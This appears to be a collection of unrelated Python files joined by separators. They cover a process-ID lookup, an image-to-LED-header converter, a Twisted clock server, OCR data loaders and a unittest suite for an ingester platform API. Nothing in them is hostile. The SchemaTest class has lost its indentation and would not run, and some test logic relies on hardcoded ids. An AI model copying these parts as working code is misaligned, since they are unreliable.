        super(StringNode, self).init(context)
        # one string input socket, and a variable output carrying the value
        self.add_input('NodeSocketString', 'String In')
        self.add_output('NodeSocketString', 'String Out', is_var=True)
# register this node under the package's default category
add_node(StringNode, category=PKG_AS_CATEGORY)
|
import psutil
# Look up the PIDs of every running process whose name matches user input.
nome = input("Entre com o nome do processo a ser buscado: ")
lista_pid = []
for i in psutil.pids():
    # A process can terminate (or deny access) between psutil.pids() and
    # Process()/name(); skip those instead of crashing mid-scan.
    try:
        p = psutil.Process(i)
        if p.name() == nome:
            lista_pid.append(str(i))
    except (psutil.NoSuchProcess, psutil.AccessDenied):
        continue
if len(lista_pid) > 0:
    print(f"O(s) PID(s) de {nome} são:")
    print(','.join(lista_pid))
else:
    print(nome,"não está executando no momento.")
# Written in Python 2
from __future__ import division
from PIL import Image
# Sample an image on a coarse grid and emit the pixels as a C PROGMEM array
# (mapping.h) for an LED-matrix sketch.  Python 2 script (print statements).
im = Image.open( './images/256x256bb.jpg')
# Target LED-matrix dimensions (columns x rows).
matrixWidth = 30
matrixHeight = 22
imgWidth = im.width
imgHeight = im.height
print "imgSize", imgWidth, " x ", imgHeight
# Step size between sampled pixels. With true division imported, round()
# yields a float here, so x/y advance by float steps.
# NOTE(review): getpixel() then receives float coordinates — confirm the
# installed PIL/Pillow accepts this, otherwise wrap the steps in int().
wBuffer = round(imgWidth/matrixWidth)
hBuffer = round(imgHeight/matrixHeight)
print "wBuffer:", wBuffer
print "hBuffer:", hBuffer
pixVals = []
xcounter = 0
ycounter = 0
y = 0
# Walk the image top-to-bottom, left-to-right, sampling one pixel per grid cell.
while y < imgHeight:
    x = 0
    xcounter = 0
    while x < imgWidth:
        r,g,b = im.getpixel((x,y))
        # Pack RGB into a single 0xRRGGBB integer.
        pixVals.append(r<<16 | g<<8 | b)
        x += wBuffer
        xcounter += 1
    y += hBuffer
    ycounter += 1
# Diagnostics: samples taken per axis and in total.
# NOTE(review): rounding can make xcounter/ycounter differ from
# matrixWidth/matrixHeight — verify against the expected array size.
print "x counter: ", xcounter
print "y counter: ", ycounter
print "length: ", len(pixVals)
print(pixVals)
# Emit a C header; PROGMEM is AVR-specific and stubbed out elsewhere.
mapFile = open('mapping.h', 'w')
mapFile.write("#if defined(__AVR__)\n")
mapFile.write("#include <avr/pgmspace.h>\n")
mapFile.write("#elif defined(__PIC32MX__)\n")
mapFile.write("#define PROGMEM\n")
mapFile.write("#elif defined(__arm__)\n")
mapFile.write("#define PROGMEM\n")
mapFile.write("#endif\n")
mapFile.write("const unsigned short bitmap24["+str(len(pixVals))+"] PROGMEM={\n")
for val in pixVals:
    mapFile.write(str(val) + ", ")
mapFile.write("\n")
mapFile.write("};\n")
|
from twisted.internet import reactor
from twisted.web.resource import Resource
from twisted.web.server import Site
import time
class ClockPage(Resource):
    """Twisted web resource that serves the current local time as plain text."""
    isLeaf = True  # terminal resource: no child path lookup is performed
    def render_GET(self, request):
        # NOTE(review): returns str; Twisted on Python 3 requires render_GET
        # to return bytes — confirm the target interpreter is Python 2.
        return "The local time is %s" % (time.ctime(),)
# Serve ClockPage on TCP port 8000; reactor.run() blocks until shutdown.
resource = ClockPage()
factory = Site(resource)
reactor.listenTCP(8000, factory)
reactor.run()
|
import pickle
import math
import torch
import re
from tqdm import tqdm
from PIL import Image
from pathlib import Path
from torch.utils.data import Dataset
from torchvision import transforms
class DatasetSYNTH(Dataset):
    """Text-recognition dataset backed by a pickled list of
    (image filename, label) pairs.

    Samples whose label exceeds ``cfg.dtr.max_seq_len`` are dropped at load
    time. The token vocabulary observed in the kept labels is written to
    ``vocab.txt`` as a side effect of construction.
    """
    def __init__(self, cfg):
        self.cfg = cfg
        # cfg.data_path points at a pickle of (filename, label) pairs;
        # the images are expected to live in the same directory.
        with open(cfg.data_path, 'rb') as f:
            data = pickle.load(f)
        self.imagePath = Path(cfg.data_path).parent
        self.imnames, self.txt = [], []
        for fn, label in data:
            if len(label) <= cfg.dtr.max_seq_len:
                self.imnames.append(fn)
                self.txt.append(label)
            else:
                print(f'label of {fn} is longer than max_seq_len')
        # Build the vocabulary: individual characters when is_character is
        # set, otherwise whitespace-separated words.
        self.tokens = set()
        for txt in self.txt:
            if not cfg.dtr.is_character:
                txt = txt.split(' ')
            for token in txt:
                self.tokens.add(token)
        self.tokens = list(self.tokens)
        with open('vocab.txt', 'w', encoding='utf8') as f:
            f.write(' '.join(self.tokens))
    def __len__(self):
        # Number of retained (filtered) samples.
        return len(self.imnames)
    def __getitem__(self, item):
        # Wrap the index so out-of-range sampler indices still resolve.
        item = item % len(self.imnames)
        image = Image.open(self.imagePath / self.imnames[item]) # Read the image
        # Grayscale for single-channel models, RGB otherwise.
        image = image.convert('L' if self.cfg.dtr.input_channel==1 else 'RGB')
        txt = self.txt[item]
        return image, txt
class AlignCollate(object):
    """Collate a batch of (PIL image, label) pairs into a single image
    tensor plus the label tuple.

    With ``cfg.dtr.PAD`` set, each image keeps its aspect ratio and is
    right-padded to the target width (the 'Rosetta' scheme); otherwise all
    images are simply resized to (imgW, imgH).
    """
    def __init__(self, cfg):
        self.cfg = cfg.dtr
        self.imgH = self.cfg.imgH
        self.imgW = self.cfg.imgW
        self.keep_ratio_with_pad = self.cfg.PAD
    def __call__(self, batch):
        images, labels = zip(*batch)
        if not self.keep_ratio_with_pad:
            # Uniform resize: every image is forced to (imgW, imgH).
            resize = ResizeNormalize((self.imgW, self.imgH))
            tensors = [resize(img) for img in images]
        else:
            # Aspect-preserving resize to the target height, then pad on
            # the right up to imgW (clamped when the image is too wide).
            pad = NormalizePAD((self.cfg.input_channel, self.imgH, self.imgW))
            tensors = []
            for img in images:
                w, h = img.size
                new_w = min(self.imgW, math.ceil(self.imgH * (w / float(h))))
                tensors.append(pad(img.resize((new_w, self.imgH), Image.BICUBIC)))
        batched = torch.cat([t.unsqueeze(0) for t in tensors], 0)
        return batched, labels
class ResizeNormalize(object):
    """Resize a PIL image to a fixed (width, height), convert it to a
    tensor and normalize pixel values from [0, 1] into [-1.0, 1.0]."""
    def __init__(self, size, interpolation=Image.BICUBIC):
        self.size = size
        self.interpolation = interpolation
        self.toTensor = transforms.ToTensor()
    def __call__(self, img):
        # Resize first, then shift/scale in place: (x - 0.5) / 0.5.
        tensor = self.toTensor(img.resize(self.size, self.interpolation))
        return tensor.sub_(0.5).div_(0.5)
class NormalizePAD(object):
    """Convert a PIL image to a normalized tensor and right-pad it to a
    fixed width, replicating the image's last column into the padding.
    """
    def __init__(self, max_size, PAD_type='right'):
        # max_size is (channels, height, max_width) of the padded output.
        self.toTensor = transforms.ToTensor()
        self.max_size = max_size
        self.max_width_half = math.floor(max_size[2] / 2)  # NOTE(review): computed but never used here
        self.PAD_type = PAD_type
    def __call__(self, img):
        img = self.toTensor(img)
        img.sub_(0.5).div_(0.5)  # scale [0, 1] -> [-1, 1] in place
        c, h, w = img.size()
        Pad_img = torch.FloatTensor(*self.max_size).fill_(0)
        Pad_img[:, :, :w] = img  # right pad
        if self.max_size[2] != w:  # add border Pad
            # Replicate the last image column across the padded region.
            Pad_img[:, :, w:] = img[:, :, w - 1].unsqueeze(2).expand(c, h, self.max_size[2] - w)
        return Pad_img
|
import datetime
import jcudc24ingesterapi
import os.path
import unittest
from jcudc24ingesterapi.models.dataset import Dataset
from jcudc24ingesterapi.models.locations import Location, Region, LocationOffset
from jcudc24ingesterapi.schemas.data_types import FileDataType, Double, String, DateTime
from jcudc24ingesterapi.models.data_sources import PullDataSource, PushDataSource
from jcudc24ingesterapi.models.data_entry import DataEntry, FileObject
from jcudc24ingesterapi.ingester_platform_api import IngesterPlatformAPI, Marshaller,\
UnitOfWork
from jcudc24ingesterapi.authentication import CredentialsAuthentication
from jcudc24ingesterapi.models.metadata import DatasetMetadataEntry, DataEntryMetadataEntry
from jcudc24ingesterapi.schemas.metadata_schemas import DataEntryMetadataSchema, DatasetMetadataSchema
from jcudc24ingesterapi.models.sampling import PeriodicSampling #, CustomSampling, RepeatSampling
from jcudc24ingesterapi.ingester_exceptions import UnsupportedSchemaError, InvalidObjectError, UnknownObjectError, AuthenticationError,\
StaleObjectError
from jcudc24ingesterapi.schemas.data_entry_schemas import DataEntrySchema
from jcudc24ingesterapi.search import DataEntrySearchCriteria,\
DatasetMetadataSearchCriteria, LocationSearchCriteria, DatasetSearchCriteria,\
DataEntrySchemaSearchCriteria, DataEntryMetadataSearchCriteria
class SchemaTest(unittest.TestCase):
"""
This test defines and checks that the Ingester API works the way the provisioning interface expects.
"""
def setUp(self):
self.auth = CredentialsAuthentication("casey", "password")
self.ingester_platform = IngesterPlatformAPI("http://localhost:8080/api", self.auth)
self.schemas = []
def compare_schema_attrs(self, attrs_src, attrs_dst):
# make a copy
attrs_dst = attrs_dst.copy()
for attr in attrs_src:
found = False
for attr_dst in attrs_dst:
if attr in attrs_dst:
del attrs_dst[attr]
found = True
break
self.assertTrue(found, "Attribute not found "+attr)
self.assertEquals(0, len(attrs_dst), "Extra attributes in destination")
def test_data_metadata(self):
work = self.ingester_platform.createUnitOfWork()
schema = DataEntryMetadataSchema("Quality Assurance")
schema.addAttr(Double("value"))
schema.addAttr(String("description"))
work.post(schema)
work.commit()
self.schemas.append(schema)
ingested_schema = self.ingester_platform.getSchema(schema.id)
self.compare_schema_attrs(ingested_schema.attrs, schema.attrs)
self.assertEquals(ingested_schema.name, schema.name)
def test_dataset_metadata(self):
work = self.ingester_platform.createUnitOfWork()
schema = DatasetMetadataSchema("Dataset Calibration")
schema.addAttr(DateTime("date"))
schema.addAttr(String("description"))
work.post(schema)
work.commit()
self.schemas.append(schema)
ingested_schema = self.ingester_platform.getSchema(schema.id)
self.compare_schema_attrs(ingested_schema.attrs, schema.attrs)
self.assertEquals(ingested_schema.name, schema.name)
def test_data(self):
work = self.ingester_platform.createUnitOfWork()
schema = DataEntrySchema("Test123")
schema.addAttr(Double("value"))
schema.addAttr(String("description"))
work.post(schema)
work.commit()
self.schemas.append(schema)
ingested_schema = self.ingester_platform.getSchema(schema.id)
self.compare_schema_attrs(ingested_schema.attrs, schema.attrs)
self.assertEquals(ingested_schema.name, schema.name)
def test_dup_data(self):
work = self.ingester_platform.createUnitOfWork()
schema = DataEntrySchema("Test123")
schema.addAttr(Double("value"))
schema.addAttr(String("description"))
work.post(schema)
work.commit()
self.schemas.append(schema)
def test_delete(self):
work = self.ingester_platform.createUnitOfWork()
for schema in self.schemas:
work.delete(schema)
work.commit()
for schema in self.schemas:
self.assertIsNone(self.ingester_platform.getSchema(schema.id))
def tearDown(self):
self.ingester_platform.close()
class ProvisioningInterfaceTest(unittest.TestCase):
    """
    This test defines and checks that the Ingester API works the way the provisioning interface expects.
    """
    def setUp(self):
        # Requires an ingester service listening on localhost:8080.
        self.auth = CredentialsAuthentication("casey", "password")
        self.ingester_platform = IngesterPlatformAPI("http://localhost:8080/api", self.auth)
        self.cleanup_files = []
    def test_api_usage(self):
        """Walk through the full provisioning workflow: regions, locations,
        datasets, manual data entry, metadata, searching, and teardown."""
        # User data that is created by filling out the provisioning interface workflow steps.
        # General
        title = "Test project"
        data_manager = "A Person"
        project_lead = "Another Person"
        # Metadata
        project_region = Region("Test Region", ((1, 1), (2, 2),(2,1), (1,1)))
        # Methods & Datasets
        loc1 = Location(11.0, 11.0, "Test Site", 100)
        loc2 = Location(11.0, 11.0, "Test Site", 100)
        loc3 = Location(12.0, 11.0, "Test Site", 100)
        temp_work = self.ingester_platform.createUnitOfWork()
        temperature_schema = DataEntrySchema("Test Temp Schema")
        temperature_schema.addAttr(Double("temperature"))
        temp_work.post(temperature_schema)
        temp_work.commit()
        air_temperature_schema = DataEntrySchema("Air Temp Schema")
        air_temperature_schema.extends = [temperature_schema.id]
        air_temperature_schema = self.ingester_platform.post(air_temperature_schema)
        second_level_inheritence_schema = DataEntrySchema("Second Inheritence")
        second_level_inheritence_schema.extends = [air_temperature_schema.id]
        second_level_inheritence_schema = self.ingester_platform.post(second_level_inheritence_schema)
        # Check the name is set
        temperature_schema_1 = self.ingester_platform.getSchema(temperature_schema.id)
        self.assertIsNotNone(temperature_schema.name)
        # assertEquals is a deprecated alias (removed in Python 3.12);
        # assertEqual is used throughout this class instead.
        self.assertEqual(temperature_schema.name, temperature_schema_1.name)
        file_schema = DataEntrySchema()
        file_schema.addAttr(FileDataType("file"))
        file_schema = self.ingester_platform.post(file_schema)
        dataset1 = Dataset(location=None, schema=temperature_schema.id)
        dataset2 = Dataset(location=None, schema=file_schema.id, data_source=PullDataSource("http://test.com", "file_handle", processing_script="file://d:/processing_scripts/awsome_processing.py"))
        # dataset3 = Dataset(None, file_schema, PullDataSource("http://test.com", "file_handle"), CustomSampling("file://d:/sampling_scripts/awsome_sampling.py"), "file://d:/processing_scripts/awsome_processing.py")
        self.cleanup_files.append(dataset2.data_source.processing_script)
        # self.cleanup_files.push(dataset3.sampling.script)
        # self.cleanup_files.push(dataset3.processing_script)
        # Provisioning admin accepts the submitted project
        work = self.ingester_platform.createUnitOfWork()
        work.post(project_region)  # Save the region
        loc1.region = project_region.id  # Set the datasets location to use the projects region
        work.post(loc1)  # Save the location
        dataset1.location = loc1.id  # Set the datasets location
        work.post(dataset1)  # Save the dataset
        loc2.region = project_region.id
        work.post(loc2)
        dataset2.location = loc2.id
        work.post(dataset2)
        work.commit()
        # Region, location and dataset id's will be saved to the project within the provisioning system in some way
        # User searches for datasets
        # TODO: Nigel? - Define searching api
        found_dataset_id = dataset1.id  # The dataset that has an extended file schema
        # User manually enters data
        timestamp = datetime.datetime.now()
        data_entry_1 = DataEntry(found_dataset_id, timestamp)
        data_entry_1['temperature'] = 27.8  # Add the extended schema items
        data_entry_1 = self.ingester_platform.post(data_entry_1)
        self.assertIsNotNone(data_entry_1.id)
        timestamp2 = timestamp + datetime.timedelta(seconds=1)
        data_entry_2 = DataEntry(found_dataset_id, timestamp2)
        data_entry_2['temperature'] = 27.8  # Add the extended schema items
        data_entry_2 = self.ingester_platform.post(data_entry_2)
        # Exercise paging and time-window search over the two entries.
        self.assertEqual(2, len(self.ingester_platform.search(DataEntrySearchCriteria(found_dataset_id), 0, 10).results))
        result = self.ingester_platform.search(DataEntrySearchCriteria(found_dataset_id), 0, 1)
        self.assertEqual(2, result.count)
        self.assertEqual(1, len(result.results))
        self.assertEqual(1, len(self.ingester_platform.search(DataEntrySearchCriteria(found_dataset_id), 1, 1).results))
        result = self.ingester_platform.search(DataEntrySearchCriteria(found_dataset_id), 2, 1)
        self.assertEqual(0, len(result.results))
        self.assertEqual(0, len(self.ingester_platform.search(DataEntrySearchCriteria(found_dataset_id,
                            end_time=timestamp-datetime.timedelta(seconds=60)), 0, 10).results))
        self.assertEqual(0, len(self.ingester_platform.search(DataEntrySearchCriteria(found_dataset_id,
                            start_time=timestamp+datetime.timedelta(seconds=60)), 0, 10).results))
        self.assertEqual(2, len(self.ingester_platform.search(DataEntrySearchCriteria(found_dataset_id,
                            start_time=timestamp-datetime.timedelta(seconds=60),
                            end_time=timestamp+datetime.timedelta(seconds=60)), 0, 10).results))
        work = self.ingester_platform.createUnitOfWork()
        data_entry_3 = DataEntry(dataset2.id, datetime.datetime.now())
        data_entry_3['file'] = FileObject(f_handle=open(os.path.join(
                                os.path.dirname(jcudc24ingesterapi.__file__), "tests/test_ingest.xml")),
                                mime_type="text/xml")
        work.post(data_entry_3)
        work.commit()
        self.assertIsNotNone(data_entry_3.id)
        f_in = self.ingester_platform.getDataEntryStream(dataset2.id, data_entry_3.id, "file")
        self.assertIsNotNone(f_in)
        data = f_in.read()
        f_in.close()
        self.assertLess(0, len(data), "Expected data in file")
        # User enters quality assurance metadata
        quality_metadata_schema = DatasetMetadataSchema()
        quality_metadata_schema.addAttr(String("unit"))
        quality_metadata_schema.addAttr(String("description"))
        quality_metadata_schema.addAttr(Double("value"))
        quality_metadata_schema = self.ingester_platform.post(quality_metadata_schema)
        entered_metadata = DatasetMetadataEntry(data_entry_1.dataset, quality_metadata_schema.id)
        entered_metadata['unit'] = "%"
        entered_metadata['description'] = "Percent error"
        entered_metadata['value'] = 0.98
        entered_metadata = self.ingester_platform.post(entered_metadata)
        # Now find that metadata
        results = self.ingester_platform.search(DatasetMetadataSearchCriteria(data_entry_1.dataset),0 , 10).results
        self.assertEqual(1, len(results))
        data_entry_md_schema = DataEntryMetadataSchema("test")
        data_entry_md_schema.addAttr(String("description"))
        data_entry_md_schema.addAttr(Double("value"))
        data_entry_md_schema = self.ingester_platform.post(data_entry_md_schema)
        calibration = DataEntryMetadataEntry(metadata_schema_id=int(data_entry_md_schema.id), dataset_id=dataset2.id, object_id=data_entry_3.id)
        calibration["description"] = "Test"
        calibration["value"] = 1.2
        calibration2 = DataEntryMetadataEntry(metadata_schema_id=int(data_entry_md_schema.id), dataset_id=dataset2.id, object_id=data_entry_3.id)
        calibration2["description"] = "Test2"
        calibration2["value"] = 2.3
        calibration2 = self.ingester_platform.post(calibration2)
        calibrations = self.ingester_platform.search(DataEntryMetadataSearchCriteria(int(81), int(3648)), offset=0, limit=1000)
        self.assertEqual(1, len(calibrations.results))
        self.assertEqual(calibrations.results[0].schema_id, data_entry_md_schema.id)
        self.ingester_platform.delete(calibration2)
        self.ingester_platform.delete(calibration)
        self.ingester_platform.delete(data_entry_md_schema)
        # User changes sampling rate
        # FIXME: This test is going to be changed to be done by editing the dataset
        # sampling_rate_changed = Metadata(dataset1.id, type(dataset1), SampleRateMetadataSchema())
        # sampling_rate_changed.change_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
        # sampling_rate_changed.sampling = CustomSampling("file://d:/sampling_scripts/awsome_sampling.py")
        #
        # try:
        #     sampling_rate_changed = self.ingester_platform.post(sampling_rate_changed)
        #     assert(sampling_rate_changed.metadata_id is None, "Sampling rate change failed")
        # except:
        #     assert(True, "Sampling rate change failed")
        # User wants some random metadata specific to their project
        # FIXME: Not sure what use case this is trying to demonstrate
        # random_metadata_schema = DataEntryMetadataSchema()
        # random_metadata_schema.addAttr('random_field', Double())
        # random_metadata = Metadata(data_entry.data_entry_id, type(data_entry), random_metadata_schema)
        # random_metadata.random_field = 1.5
        # try:
        #     random_metadata = self.ingester_platform.post(random_metadata)
        #     assert(random_metadata.metadata_id is None, "random_metadata failed")
        # except:
        #     assert(True, "random_metadata failed")
        # User changes the data source of the dataset
        new_data_source = PullDataSource("http://test.com/new_data", "file_handle")
        dataset1.data_source = new_data_source
        dataset1 = self.ingester_platform.post(dataset1)
        self.assertNotEqual(None, dataset1)
        # External, 3rd party searches for data
        # TODO: external 3rd parties should be able to use the api to get data without authentication
        # TODO: I'm not sure exactly how this should work, but the search api could be open access (need spam limitations or something?)
        # Project is disabled/finished
        work = self.ingester_platform.createUnitOfWork()
        work.disable(dataset1.id)
        work.disable(dataset2.id)
        work.commit()
        # Project is obsolete and data should be deleted
        work = self.ingester_platform.createUnitOfWork()
        work.delete(dataset1.id)
        work.delete(dataset2.id)
        work.commit()
    def test_parent_schemas(self):
        """This test creates a nested schema with attributes provided at 2
        different levels. A data entry is saved, and then retrieved, and the
        values tested.
        """
        loc1 = self.ingester_platform.post(Location(11.0, 11.0, "Test Site", 100))
        temp_work = self.ingester_platform.createUnitOfWork()
        temperature_schema = DataEntrySchema("Test Temp Schema")
        temperature_schema.addAttr(Double("temperature"))
        temp_work.post(temperature_schema)
        temp_work.commit()
        air_temperature_schema = DataEntrySchema("Air Temp Schema")
        air_temperature_schema.extends = [temperature_schema.id]
        air_temperature_schema = self.ingester_platform.post(air_temperature_schema)
        instrument_schema = DataEntrySchema("Instrument Schema")
        instrument_schema.extends = [air_temperature_schema.id]
        instrument_schema.addAttr(Double("var2"))
        instrument_schema = self.ingester_platform.post(instrument_schema)
        dataset = Dataset(location=loc1.id, schema=instrument_schema.id)
        dataset = self.ingester_platform.post(dataset)
        work = self.ingester_platform.createUnitOfWork()
        data_entry = DataEntry(dataset.id, datetime.datetime.now())
        data_entry["temperature"] = 10
        data_entry["var2"] = 11
        work.post(data_entry)
        work.commit()
        data_entry_ret = self.ingester_platform.getDataEntry(dataset.id, data_entry.id)
        self.assertEqual(data_entry["temperature"], data_entry_ret["temperature"])
        self.assertEqual(data_entry["var2"], data_entry_ret["var2"])
    def testMultiDatasetExtraction(self):
        """This test demonstrates use case #402.
        There are 2 datasets created, the first holds a datafile, and has a pull ingest occurring, along with
        a configured custom script. The second dataset holds observation data, that will be extracted from the
        datafile in the first dataset.
        """
        temperature_schema = DataEntrySchema()
        temperature_schema.addAttr(Double("Temperature"))
        temperature_schema = self.ingester_platform.post(temperature_schema)
        file_schema = DataEntrySchema()
        file_schema.addAttr(FileDataType("file"))
        file_schema = self.ingester_platform.post(file_schema)
        location = self.ingester_platform.post(Location(10.0, 11.0, "Test Site", 100))
        temp_dataset = Dataset(location=None, schema=temperature_schema.id)
        file_dataset = Dataset(location=None, schema=file_schema.id, data_source=PullDataSource("http://test.com", "file_handle", processing_script="file://d:/processing_scripts/awsome_processing.py"))
    def test_listeners(self):
        """Verify that an object listener fires once the posted object
        receives its real (positive) server-assigned id."""
        # Use a list to beat the closure
        called = [False]
        def loc_listener(obj, var, value):
            # The listener will be called when the object is posted
            # and when it is committed, so we want to filter out the
            # post call
            if var == "_id" and value > 0:
                called.remove(False)
                called.append(True)
        loc = Location()
        loc.name = "Test Loc1"
        loc.set_listener(loc_listener)
        work = self.ingester_platform.createUnitOfWork()
        work.post(loc)
        work.commit()
        self.assertTrue(called[0])
    def tearDown(self):
        """Reset the service and best-effort delete any script files
        recorded during the test."""
        self.ingester_platform.reset()
        for f in self.cleanup_files:
            try:
                os.remove(f)
            except OSError:
                # Fixed: was a bare `except:` plus a Python 2 print
                # statement, which is a SyntaxError under Python 3.
                print("failed to remove file: " + f)
class TestIngesterModels(unittest.TestCase):
    """Unit tests for the client-side model objects (no service required)."""
    def test_authentication(self):
        # TODO: not yet implemented.
        pass
    def test_ingester_exceptions(self):
        # TODO: not yet implemented.
        pass
    def test_listeners(self):
        """Setting an id on a Location must fire its listener exactly once."""
        # Use a list to beat the closure
        called = [False]
        def loc_listener(obj, var, value):
            called.remove(False)
            called.append(True)
            self.assertEquals("_id", var)
            self.assertEquals(1, value)
        loc = Location()
        loc.set_listener(loc_listener)
        loc.id = 1
        self.assertTrue(called[0])
#    def test_ingester_platform(self):
#        self.ingester_platform = IngesterPlatformAPI()
#        dataset = self.ingester_platform.post(self.auth, self.dataset)
#        self.assertTrue(dataset is set, "Failed to add dataset to ingester API")
#        self.assertTrue(dataset.dataset_id is set and dataset.dataset_id >= 0,
#            "Ingester API returned dataset with invalid dataset_id")
#        self.dataset = dataset
#
#        data_entry = self.ingester_platform.post(self.auth, self.data_entry)
#        self.assertTrue(data_entry is set, "Failed to add data_entry to ingester API")
#        self.assertTrue(data_entry.data_entry_id is set and data_entry.data_entry_id >= 0,
#            "Ingester API returned data_entry with invalid data_entry_id")
#        self.data_entry = data_entry
#
#        datasets = self.ingester_platform.get(self.auth, Dataset())  # Get all datasets
#        self.assertTrue(len(datasets) > 0, "Ingester API failed to insert dataset")
#        self.assertIn(self.dataset, datasets, "Ingester API didn't return the inserted dataset")
#
#        data_quality = Metadata(self.data_entry, QualityMetadataSchema(), {"description": "Sensor was moved", "value": 0})
#        stored_data_quality = self.ingester_platform.post(self.auth, data_quality)
#        self.assertEquals(data_quality, stored_data_quality)
#
#        sampling_rate = Metadata(self.dataset, SampleRateMetadataSchema(), {"sampling": PeriodicSampling()})
#
#        location_elevation_type = Metadata(self.location, NoteMetadataSchema(),
#            {"name": "Elevation type", "text": "Height above ground"})
    def test_ingester_scripts(self):
        # TODO: not yet implemented.
        pass
class TestIngesterPersistence(unittest.TestCase):
    """This set of tests checks that the CRUD functionality works as expected
    """
    def setUp(self):
        # Requires an ingester service listening on localhost:8080.
        self.auth = CredentialsAuthentication("casey", "password")
        self.ingester_platform = IngesterPlatformAPI("http://localhost:8080/api", self.auth)
        self.cleanup_files = []
    def test_region_persistence(self):
        # Posting a region must assign it a server-side id.
        project_region = Region("Test Region", ((1, 1), (2, 2),(2,1), (1,1)))
        project_region1 = self.ingester_platform.post(project_region)
        self.assertNotEqual(project_region1.id, None, "ID should have been set")
    def test_location_persistence(self):
        # Create, read back, then update a Location, checking optimistic
        # version locking (StaleObjectError) along the way.
        loc = Location(10.0, 11.0, "Test Site", 100, None)
        loc1 = self.ingester_platform.post(loc)
        self.assertNotEqual(loc1.id, None, "ID should have been set")
        self.assertEqual(loc.latitude, loc1.latitude, "latitude does not match")
        self.assertEqual(loc.longitude, loc1.longitude, "longitude does not match")
        self.assertEqual(loc.elevation, loc1.elevation, "elevation does not match")
        self.assertEqual(loc.name, loc1.name, "name does not match")
        locs = self.ingester_platform.search(LocationSearchCriteria(),0 , 10).results
        self.assertEquals(1, len(locs))
        # Now update the location
        loc1.name = "The Test Site"
        loc1.latitude = -19.0
        # Test that the version check is observed
        self.assertEquals(1, loc1.version)
        loc1.version = 0
        # A stale version number must be rejected by the service.
        self.assertRaises(StaleObjectError, self.ingester_platform.post, loc1)
        loc1.version = 1
        loc2 = self.ingester_platform.post(loc1)
        self.assertEqual(loc1.id, loc2.id, "")
        self.assertEqual(loc1.latitude, loc2.latitude, "latitude does not match")
        self.assertEqual(loc1.longitude, loc2.longitude, "longitude does not match")
        self.assertEqual(loc1.elevation, loc2.elevation, "elevation does not match")
        self.assertEqual(loc1.name, loc2.name, "name does not match")
    def test_dataset_persistence(self):
        # Persist a dataset with a pull data source, an inline processing
        # script and a location offset, then verify every field round-trips.
        loc = Location(10.0, 11.0, "Test Site", 100, None)
        loc = self.ingester_platform.post(loc)
        self.assertIsNotNone(loc, "Location should not be none")
        self.assertIsNotNone(loc.id, "Location should not be none")
        file_schema = DataEntrySchema()
        file_schema.addAttr(FileDataType("file"))
        file_schema = self.ingester_platform.post(file_schema)
        script_contents = """Some Script
More"""
        dataset = Dataset(location=loc.id, schema=file_schema.id, data_source=PullDataSource("http://www.bom.gov.au/radar/IDR733.gif", "file", processing_script=script_contents), location_offset=LocationOffset(0, 1, 2))
        dataset1 = self.ingester_platform.post(dataset)
        self.assertIsNotNone(dataset1, "Dataset should not be none")
        self.assertEquals(dataset1.location, dataset.location, "Location ID does not match")
        self.assertEquals(dataset1.schema, dataset.schema, "schema does not match %d!=%d"%(dataset1.schema, dataset.schema))
        self.assertEquals(dataset1.location_offset.x, 0)
        self.assertEquals(dataset1.location_offset.y, 1)
        self.assertEquals(dataset1.location_offset.z, 2)
        self.assertEquals(script_contents, dataset1.data_source.processing_script)
        # The dataset must also be discoverable via the query APIs.
        datasets = self.ingester_platform.findDatasets()
        self.assertEquals(1, len(datasets))
        datasets = self.ingester_platform.findDatasets(location=loc.id)
        self.assertEquals(1, len(datasets))
        data_entry_schemas = self.ingester_platform.search(DataEntrySchemaSearchCriteria(),0 , 10).results
        self.assertEquals(1, len(data_entry_schemas))
        datasets = self.ingester_platform.search(DatasetSearchCriteria(),0 , 10).results
        self.assertEquals(1, len(datasets))
    def test_schema_persistence(self):
        # A bare file schema should post without error.
        file_schema = DataEntrySchema()
        file_schema.addAttr(FileDataType("file"))
        self.ingester_platform.post(file_schema)
    def test_unit_of_work_persistence(self):
        # Insert a location, schema and dataset in one unit of work;
        # ids are assigned at insert time and become real on commit.
        unit = self.ingester_platform.createUnitOfWork()
        loc = Location(10.0, 11.0, "Test Site", 100, None)
        unit.insert(loc)
        self.assertIsNotNone(loc.id)
        file_schema = DataEntrySchema()
        file_schema.name = "File Schema"
        file_schema.addAttr(FileDataType("file"))
        file_schema_id = unit.insert(file_schema)
        self.assertIsNotNone(file_schema_id, "Schema ID should not be null")
        dataset = Dataset(location=loc.id, schema=file_schema.id, data_source=PullDataSource("http://www.bom.gov.au/radar/IDR733.gif", "file"))
        unit.insert(dataset)
        # Persist all the objects
        unit.commit()
        self.assertIsNotNone(loc, "Location should not be none")
        self.assertIsNotNone(loc.id, "Location should not be none")
        self.assertGreater(loc.id, 0, "Location ID not real")
        self.assertEqual(loc.name, "Test Site", "Location name doesn't match")
        self.assertIsNotNone(dataset, "dataset should not be none")
        self.assertIsNotNone(dataset.id, "dataset should not be none")
        self.assertGreater(dataset.id, 0, "dataset ID not real")
    def tearDown(self):
        # Reset server-side state so tests remain independent.
        self.ingester_platform.reset()
class TestIngesterFunctionality(unittest.TestCase):
    """This set of tests test the actual functioning of the service.
    """
    def setUp(self):
        # Requires an ingester service listening on localhost:8080.
        self.auth = CredentialsAuthentication("casey", "password")
        self.ingester_platform = IngesterPlatformAPI("http://localhost:8080/api", self.auth)
        self.cleanup_files = []
    def test_pull_ingest_functionality(self):
        # Create a location, a file schema and a periodically sampled pull
        # dataset, then verify the dataset can be disabled.
        loc = Location(10.0, 11.0, "Test Site", 100, None)
        loc = self.ingester_platform.post(loc)
        file_schema = DataEntrySchema()
        file_schema.addAttr(FileDataType("file"))
        file_schema = self.ingester_platform.post(file_schema)
        dataset = Dataset(location=loc.id, schema=file_schema.id, data_source=PullDataSource("http://www.bom.gov.au/radar/IDR733.gif", "file", sampling=PeriodicSampling(10000)))
        dataset1 = self.ingester_platform.post(dataset)
        self.assertEquals(dataset1.location, dataset.location, "Location ID does not match")
        self.assertEquals(dataset1.schema, dataset.schema, "schema does not match")
        self.ingester_platform.disableDataset(dataset1.id)
        dataset1a = self.ingester_platform.getDataset(dataset1.id)
        self.assertEquals(dataset1a.enabled, False)
    def tearDown(self):
        # Reset server-side state so tests remain independent.
        self.ingester_platform.reset()
#class TestProjectFunctionality(unittest.TestCase):
# #---------------Create example data---------------
# def setUp(self):
# self.auth = CredentialsAuthentication("casey", "password")
# self.ingester_platform = IngesterPlatformAPI("http://localhost:8080", self.auth)
# self.cleanup_files = []
#
# def test_connection(self):
